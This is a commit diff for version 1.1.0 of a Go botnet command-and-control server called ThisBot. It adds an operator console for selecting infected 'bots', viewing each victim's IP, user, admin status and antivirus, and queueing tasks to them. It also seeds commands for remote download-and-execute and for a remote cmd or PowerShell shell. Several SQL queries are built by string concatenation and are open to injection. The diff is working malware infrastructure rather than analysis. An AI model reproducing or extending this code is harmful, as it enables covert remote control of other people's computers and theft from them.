⚡ Update v1.1.0

1. Add select command
2. Add mode command
3. Optimize database design
4. Update exec command
5. Add initialize commands option
6. Other fixes

Author: unknown

.gitignore

@@ -5,4 +5,5 @@
 /client/.vscode/
 /server/.vscode/
 /test/
-/pic/
+/pic/
+/server/*.exe

server/common/global.go

@@ -7,10 +7,12 @@ import (
 )
 
 var (
-	Seed            = rand.New(rand.NewSource(time.Now().UnixNano()))
-	Cfg             = Config{}
-	Db      *sql.DB = nil
-	Version         = "v1.0.0"
+	Seed               = rand.New(rand.NewSource(time.Now().UnixNano()))
+	Cfg                = Config{}
+	Db         *sql.DB = nil
+	Version            = "v1.1.0"
+	Account            = ""
+	CurrentBot int64   = 5
 )
 
 const ConfigDefaultFileName = "config.yaml"
@@ -38,12 +40,6 @@ type Config struct {
 	} `yaml:"auth"`
 }
 
-// type Account struct {
-// 	Id       int
-// 	Username string
-// 	Password string
-// }
-
 type Client struct {
 	Id          int    `json:"id"`
 	Guid        string `json:"guid"`
@@ -61,25 +57,6 @@ type Client struct {
 	Lastcommand string `json:"lastcommand"`
 }
 
-// type Command struct {
-// 	Id          int
-// 	Command     string
-// 	Timeanddate string
-// }
-
-// type Lastlogin struct {
-// 	Id          int
-// 	Timeanddate string
-// }
-
-// type Tasks struct {
-// 	Id      int
-// 	Name    string
-// 	Guid    string
-// 	Command string
-// 	Method  string
-// }
-
 type ServerReply struct {
 	Status  int               `json:"status"`
 	Cmd     string            `json:"cmd"`

server/db1/mysql.go

@@ -2,6 +2,7 @@ package db1
 
 import (
 	"database/sql"
+	"encoding/json"
 	"fmt"
 	"log"
 	"time"
@@ -54,3 +55,23 @@ func Exec(db *sql.DB, query string, args ...any) (int64, error) {
 	}
 	return res.RowsAffected()
 }
+
+func InitCommands(db *sql.DB) {
+	args := map[string]interface{}{
+		"hidden": "string",
+		"args":   "string",
+	}
+	byt, _ := json.Marshal(args)
+	// Remote execute
+	sqlStr := "insert into commands(name, description, arg_schema, needs_admin) values (?,?,?,?)"
+	Insert(db, sqlStr, "execute", "Remote download executing, it could run local files or "+
+		"download from remote host and execute", byt, 0)
+	// Remote shell
+	args1 := map[string]interface{}{
+		"type": "string",
+	}
+	byt, _ = json.Marshal(args1)
+	Insert(db, sqlStr, "shell", "Remote commandline shell, cmd or powershell", byt, 0)
+	// List bot latest information
+	Insert(db, sqlStr, "info", "Request bot latest information", nil, 0)
+}

server/main.go

@@ -5,13 +5,18 @@ import (
 	"ThisBot/config"
 	"ThisBot/db1"
 	"ThisBot/utils"
+	"bufio"
+	"database/sql"
+	"encoding/json"
 	"fmt"
 	"log"
 	"os"
 	"os/exec"
 	"path"
 	"runtime"
+	"strconv"
 	"strings"
+	"sync"
 	"time"
 
 	_ "github.com/go-sql-driver/mysql"
@@ -30,14 +35,143 @@ func show_banner() {
 
 func help_handler() {
 	fmt.Println("1. help/h: Show help menu")
-	fmt.Println("2. exec [option] path/url: Execute executable file or download from host and execute, option could be -h means hide file")
+	fmt.Println("2. exec path/url [args]: Execute executable file or download from host and execute")
 	fmt.Println("3. cmd/pws: Remote cmd or powershell")
 	fmt.Println("4. list: Show all bots")
 	fmt.Println("5. info id: Show bot info which ID is id")
+	fmt.Println("6. select botid: Select a connected bot to operate")
+	fmt.Println("7. clear: Clean the screen")
+	fmt.Println("8. mode [broadcast]: Show current mode or switch to broadcast")
+}
+
+func select_handler(ary []string) {
+	if len(ary) < 2 {
+		fmt.Println("Usage: select botid, please enter help command")
+		return
+	}
+	// Check it's a number
+	botid, err := strconv.ParseInt(ary[1], 10, 64)
+	if err != nil || botid == 0 {
+		fmt.Println("You need to enter a bot id which is number")
+		return
+	}
+	// Check if bot in database record
+	var bot common.Client
+	if get_bot_info(botid, &bot) == false {
+		fmt.Println("[-] Bot doesn't exist, please enter right bot id")
+		return
+	}
+	// Switch mode
+	common.CurrentBot = botid
+	var mu sync.Mutex
+
+	mu.Lock()
+	fmt.Println("🐾 --------------------------------------------------- 🐾")
+	fmt.Println("⚔️⚔️⚔️  Currrent bot: ")
+	fmt.Println("🐾 --------------------------------------------------- 🐾")
+	fmt.Printf("👣 ID: %d\n", botid)
+	fmt.Println("🏴 Guid: " + bot.Guid)
+	fmt.Println("🌍 IP: " + bot.Ip)
+	fmt.Println("👽 Who: " + bot.Whoami)
+	fmt.Println("💻 OS: " + bot.Os)
+	install, _ := strconv.ParseInt(bot.Installdate, 10, 64)
+	t := time.UnixMilli(install)
+	fmt.Println("📅 InstallDate: " + t.Format("2006-01-02 15:04:05"))
+	admin := "yes"
+	if bot.Isadmin != admin {
+		admin = "no"
+	}
+	fmt.Println("👽 Admin: " + admin)
+	fmt.Println("😈 Anti-Virus: " + bot.Antivirus)
+	fmt.Println("🤖 CPU: " + bot.Cpuinfo)
+	fmt.Println("🎭 GPU: " + strings.TrimSpace(bot.Gpuinfo))
+	lastseen, _ := strconv.ParseInt(bot.Lastseen, 10, 64)
+	t = time.UnixMilli(lastseen)
+	fmt.Println("🔬 Lastseen: " + t.Format("2006-01-02 15:04:05"))
+	fmt.Println("👾 Version: v" + bot.Version)
+	fmt.Println("🐾 --------------------------------------------------- 🐾")
+	mu.Unlock()
 }
 
 func exec_handler(ary []string) {
-	// if len(ary)
+	if len(ary) < 2 {
+		fmt.Println("Usage: exec path/url [args], please enter help command")
+		return
+	}
+	var options string = ""
+	for i := 1; i < len(ary); i++ {
+		options += " " + ary[i]
+	}
+	options = strings.TrimSpace(options)
+	// Complete the command
+	if strings.ToLower(ary[0]) == "exec" {
+		ary[0] = "execute"
+	}
+	// Query if there's command in database
+	sqlStr := "select id from commands where name='" + ary[0] + "'"
+
+	command_id := 0
+	err := db1.QueryRow(common.Db, sqlStr).Scan(&command_id)
+	if err != nil {
+		if err == sql.ErrNoRows {
+			fmt.Println("No such command")
+
+		} else {
+			fmt.Println("Command error")
+		}
+		return
+	}
+
+	sqlStr = "insert into tasks (bot_id, command_id, args, status) values (?,?,?,?)"
+	map_args := map[string]interface{}{
+		"args":   options,
+		"hidden": "false",
+	}
+	byt, _ := json.Marshal(map_args)
+	_, err = db1.Insert(common.Db, sqlStr, common.CurrentBot, command_id, byt, "queued")
+	if err != nil {
+		fmt.Println("[-] Failed to generate command")
+		return
+	} else {
+		fmt.Println("[+] Generate command okay")
+	}
+}
+
+func info_handler(ary []string) {
+	if len(ary) < 2 {
+		fmt.Println("[-] Usage: info id, request latest bot information")
+		return
+	}
+	// TODO
+}
+
+func get_bot_info(botid int64, bot *common.Client) bool {
+	// Check if bot in database record
+	sqlStr := "select guid, ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastseen from clients where id='" + strconv.FormatInt(botid, 10) + "'"
+	err := db1.QueryRow(common.Db, sqlStr).Scan(&bot.Guid, &bot.Ip, &bot.Whoami, &bot.Os, &bot.Installdate, &bot.Isadmin, &bot.Antivirus, &bot.Cpuinfo, &bot.Gpuinfo, &bot.Version, &bot.Lastseen)
+	if err != nil {
+		return false
+	}
+
+	bot.Id = int(botid)
+	return true
+}
+
+func mode_handler(ary []string) {
+	if len(ary) == 1 {
+		if common.CurrentBot == 0 {
+			fmt.Println("[+] Broadcast mode")
+		} else {
+			fmt.Println("[+] Current bot ID: " + strconv.FormatInt(common.CurrentBot, 10))
+		}
+	} else {
+		if ary[1] == "broadcast" {
+			common.CurrentBot = 0
+			fmt.Println("[+] Switch to broadmode")
+		} else {
+			fmt.Println("[-] Failed to switch to broadcast mode")
+		}
+	}
 }
 
 func list_handler() {
@@ -98,6 +232,10 @@ func main() {
 	// Initialize all
 	config.Init(&common.Cfg)
 
+	if len(os.Args) > 1 && os.Args[1] == "--init-commands" {
+		db1.InitCommands(common.Db)
+	}
+
 	// Running the task cleaner
 	task_cleaner(common.Db, 5*60)
 	// Running the server
@@ -110,12 +248,17 @@ func main() {
 	show_banner()
 	for {
 		fmt.Print("$ ")
-		fmt.Scanln(&command)
+		command, _ = bufio.NewReader(os.Stdin).ReadString('\n')
 		command = strings.TrimSpace(command)
+		if command == "" {
+			continue
+		}
 		cmdAry := strings.Fields(command)
 
 		switch cmdAry[0] {
-		case "list":
+		case "select", "s":
+			select_handler(cmdAry)
+		case "list", "l":
 			list_handler()
 		case "help", "h":
 			help_handler()
@@ -124,7 +267,12 @@ func main() {
 		case "clear":
 			clear_handler()
 			show_banner()
+		case "info":
+			info_handler(cmdAry)
+		case "mode":
+			mode_handler(cmdAry)
 		}
+
 	}
 
 }

server/server.go

@@ -7,7 +7,6 @@ import (
 	"crypto/hmac"
 	"database/sql"
 	"encoding/json"
-	"io"
 	"log"
 	"net/http"
 	"strconv"
@@ -51,9 +50,8 @@ func recovery_handler(w http.ResponseWriter, r *http.Request) {
 	guid := r.Header.Get("X-Guid")
 	time1 := r.Header.Get("X-Time")
 	// Read bot info
-	botinfo, _ := io.ReadAll(r.Body)
 	var bot common.Client
-	json.Unmarshal(botinfo, &bot)
+	utils.ReadJson(r, &bot)
 
 	reply := common.ServerReply{
 		Args: make(map[string]any),
@@ -160,6 +158,7 @@ func poll_handler(w http.ResponseWriter, r *http.Request) {
 			reply.Error = "Illegal package"
 			reply.Cmd = "poll"
 		} else {
+			// TODO FIX BUG
 			sqlStr = "select t.id as task_id, c.command, c.args" +
 				" from tasks t join commands c on t.command_id = c.id" +
 				" where t.guid = ? and t.status = 'queued' order by t.created_at asc limit 1"